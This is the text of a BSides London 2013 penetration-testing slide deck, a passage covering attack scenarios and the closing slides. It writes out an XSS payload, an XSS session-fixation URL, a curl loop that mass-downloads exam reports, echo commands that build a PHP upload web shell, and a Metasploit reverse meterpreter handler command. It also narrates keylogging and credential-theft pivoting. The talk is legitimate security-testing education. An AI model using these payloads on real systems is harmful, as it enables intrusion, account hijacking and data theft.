![Page 74: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/74.jpg)
Scenario 4: SummaryPre-Engagement: No permission to test ���� Game prep1) .NET app: OMG they have a firewall ☺2) Hmm they also have an XML file upload!3) Identify best path of attack: XSS via encoded field in XML file upload<iframe onload="javascript:ALERT('OWNED')" src="http://www.google.com"></iframe>
Engagement: Permission to test ���� Game performance1) Pwn customer on “minute 1”:Persistent XSS via XML upload
![Page 75: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/75.jpg)
Scenario 4: PoC
![Page 76: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/76.jpg)
Scenario 5: SummaryPre-Engagement: No permission to test ���� Game prep• File upload check: Can upload doc files2) Noting URL:http://target.com/attachments/..........._test.doc
3) Log out4) Try to get uploaded file: Success � Auth bypass5) Prepare attack: Write script to download all documents
Engagement: Permission to test ���� Game performance1) Pwn customer on “minute 1”:Run script
![Page 77: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/77.jpg)
Scenario 6: Summary1) Session Id does not change after login2) Got XSS3) Prepping XSS + Session fixation exploit:
https://target.com/sample.php?Code='><script>document.cookie='PHPSESSID=3ssc1h5464qonvhuq3gm5u49q6; path=/'; window.location='https://target.com/login/';</script><br
Bottom line: Session fixation through XSS is possible
![Page 78: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/78.jpg)
Scenario 7: Summary1) Site A makes a request to Site B with NO security tokens2) Site A retrieves sensitive info from Site B using 1)3) Problem verification:
curl --referer 'https://target.com/demo.php' http://target2.com/demo.jsp?userid=xxxxxxx&examid=xxxxxxxx| lynx --dump -stdin|more
Quick Exploit: � Downloads arbitrary exam reports..for i in $(php -r 'echo implode(" ",range(11200,16000));'); do echo "Trying $i .."; curl … > tmp.html ; BAD=$(grep '500 - Internal server error' tmp.html|wc -l); if [ $BAD -eq 0 ]; then
cp tmp.html $i.html; # Got a hitfidone
![Page 79: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/79.jpg)
Scenario 8: AppSec2NetSec
1) Initial scope: 1 app server on cloud provider2) File Upload vuln3) Getting a nice shell4) Run keylogger5) Mapped hosts6) Reused passwords7) Pwned 17 servers (GUI access on 16)8) No admin detected the attack ☺
![Page 80: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/80.jpg)
Scenario 8: AppSec2NetSec
2) Classic File upload, Null character and shell
Small gotcha: Image had to be valid so I used a GIF file with PHP code in the comment (using GIMP)
![Page 81: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/81.jpg)
Scenario 8: AppSec2NetSec
3) Shell is only the beginning, you know? ☺
In windows, by default (i.e. next / next / finish install) Apache runs as SYSTEM, i.e. more than Admin, no need to escalate ☺
![Page 82: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/82.jpg)
Scenario 8: AppSec2NetSec3) Getting comfortable (no tftp, etc)Creating a file upload PHP shell from a DOS shell.. NOTE: “^” is a escape character in windows
echo ^<?php > file_upload.phpecho if (isset($_POST['Action']) ^&^& $_POST['Action'] == 'go') { >> file_upload.phpecho if (@move_uploaded_file($_FILES['MyFile']['tmp_name'], $_FILES['MyFile']['name']) == false) { >> file_upload.phpecho die('Error when uploading: '.$_FILES['MyFile']['error']); >> file_upload.phpecho } >> file_upload.phpecho else { >> file_upload.phpecho echo 'upload ok!'; >> file_upload.phpecho } >> file_upload.phpecho } >> file_upload.phpecho ?^> >> file_upload.phpecho ^<html^>^<form action="" enctype="multipart/form-data" name="myform" id="myform" method="post"^>^<input type="hidden" name="Action" value="go" /^>^<input type="file" name="MyFile" id="MyFile" value="" size="80" maxlength="255" /^>^<input type="submit" name="send" value="Submit" /^>^</form^>^</html^> >> file_upload.php
![Page 83: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/83.jpg)
Scenario 8: AppSec2NetSec3) Now we’re ready to upload a reverse meterpreter shell ☺
![Page 84: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/84.jpg)
Scenario 8: AppSec2NetSecCheck before meterpreter upload: AV Fingerprint via ‘tasklist’
![Page 85: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/85.jpg)
Scenario 8: AppSec2NetSecYou are totally blocking port 80 outbound, huh? ☺
# /pentest/exploits/framework3/msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.0.127 LPORT=80 E
…
![Page 86: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/86.jpg)
Scenario 8: AppSec2NetSecLM hashes were disabled, NT LM hashes were tough to crack .. Time to improvise
![Page 87: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/87.jpg)
Scenario 8: AppSec2NetSecMap network with arp –a, etc via winenum: � winenum is very scary…
![Page 88: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/88.jpg)
Scenario 8: AppSec2NetSecGetting GUI access:
![Page 89: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/89.jpg)
Scenario 8: AppSec2NetSecNo need to crack our own password ☺
![Page 90: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/90.jpg)
Scenario 8: AppSec2NetSecIf you can’t crack passwords you might be able to steal them..
Patience is worth its prize…
![Page 91: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/91.jpg)
Scenario 8: AppSec2NetSec
While you are waiting, you might as well dump memory..
![Page 92: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/92.jpg)
Scenario 8: AppSec2NetSecPivoting around using stolen passwords..
![Page 93: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/93.jpg)
Scenario 8: AppSec2NetSecPivoting .. Where? ☺ � Approach 1) Run History
![Page 94: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/94.jpg)
Scenario 8: AppSec2NetSecApproach 2) Merge winenum info
PASSIVE Ping Sweep: Unique IPs & MACs from the ARP table of all popped boxes via winenum
![Page 95: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/95.jpg)
Scenario 8: AppSec2NetSec
PASSIVE Local “Port scanning” from winenum
![Page 96: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/96.jpg)
Scenario 8: AppSec2NetSec
Don’t forget about IPv6 & UDP ☺
![Page 97: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/97.jpg)
Scenario 8: AppSec2NetSec
PASSIVE Remote “Port scanning” from winenumvia active connections
![Page 98: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/98.jpg)
Scenario 8: AppSec2NetSec
Admin shares (c$, d$, etc), SSL private keys, ..
![Page 99: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/99.jpg)
Scenario 8: AppSec2NetSec
So you have hard-coded credentials in your scripts?
![Page 100: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/100.jpg)
Scenario 8: AppSec2NetSecLet’s try those …
![Page 101: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/101.jpg)
Scenario 8: AppSec2NetSecTrying…
![Page 102: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/102.jpg)
Scenario 8: AppSec2NetSecSeeing the shares thanks to your script credentials:
![Page 103: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/103.jpg)
Scenario 8: AppSec2NetSecDoes your application store user credentials in clear-text on the user session files?
![Page 104: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/104.jpg)
Scenario 8: AppSec2NetSec
Yup ☺
![Page 105: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/105.jpg)
Scenario 8: AppSec2NetSec
And my personal favourite (only had to click OK ☺):
![Page 106: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/106.jpg)
Conclusion3 Strength Factors:
1) Individual Skill• Skill > Intelligence + Talent (Hard work beats talent)• Hack your subconscious (!mental barriers)• Don’t stop: Eat it, breathe it, sleep it
2) Game preparation• Prep ahead: Recon + analysis + plan• Scope like a pro: Negotiate scope, extensions, etc.
3) Game performance• 1st Sweep: Shallow + wide analysis first• 2nd Sweep: Deep + narrow analysis of best options• Analyse only once •Don’t lose the will to fight + Take the hit
![Page 107: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/107.jpg)
Thanks to Brucon 5by5
Brucon 5by5 sponsorship of OWASP OWTFhttp://blog.brucon.org/2013/02/the-5by5-race-is-on.html
![Page 108: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/108.jpg)
Thanks to OWASP GSoC 2013
Google Student sponsorship of OWASP OWTFhttps://www.owasp.org/index.php/GSoC
Student Proposals: April 22th-May 3rd 2013 � Still on time!
![Page 109: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/109.jpg)
Special thanks to
OWASP Testing Guide contributors
Finux Tech Weekly – Episode 17 – mins 31-49http://www.finux.co.uk/episodes/mp3/FTW-EP17.mp3Finux Tech Weekly – Episode 12 – mins 33-38http://www.finux.co.uk/episodes/mp3/FTW-EP12.mp3Exotic Liability – Episode 83 – mins 49-53http://exoticliability.libsyn.com/exotic-liability-83-oh-yeahEurotrash 32: http://www.eurotrashsecurity.eu/index.php/Episode_32
Adi Mutu (@an_animal), Andrés Riancho (@w3af), BharadwajMachiraju, Gareth Heyes (@garethheyes), Krzysztof Kotowicz
(@kkotowicz), Marc Wickenden (@marcwickenden), Marcus Niemietz(@mniemietz), Mario Heiderich (@0x6D6172696F), Michael Kohl
(@citizen428), Nicolas Grégoire (@Agarri_FR), Sandro Gauci(@sandrogauci)
![Page 110: Pentesting like a grandmaster BSides London 2013](https://reader034.fdocuments.net/reader034/viewer/2022052505/554da2bdb4c905ff7a8b47cc/html5/thumbnails/110.jpg)
Q&A
Abraham Aranguren@7a_ @owtfp
[email protected]://7-a.org
http://owtf.org
Project Site (links to everything): http://owtf.org• Try OWTF: https://github.com/7a/owtf_releases• Try a demo report: https://github.com/7a/owtf_demos• Documentation: https://github.com/7a/owtf/wiki• Contribute/Download: https://github.com/7a/owtf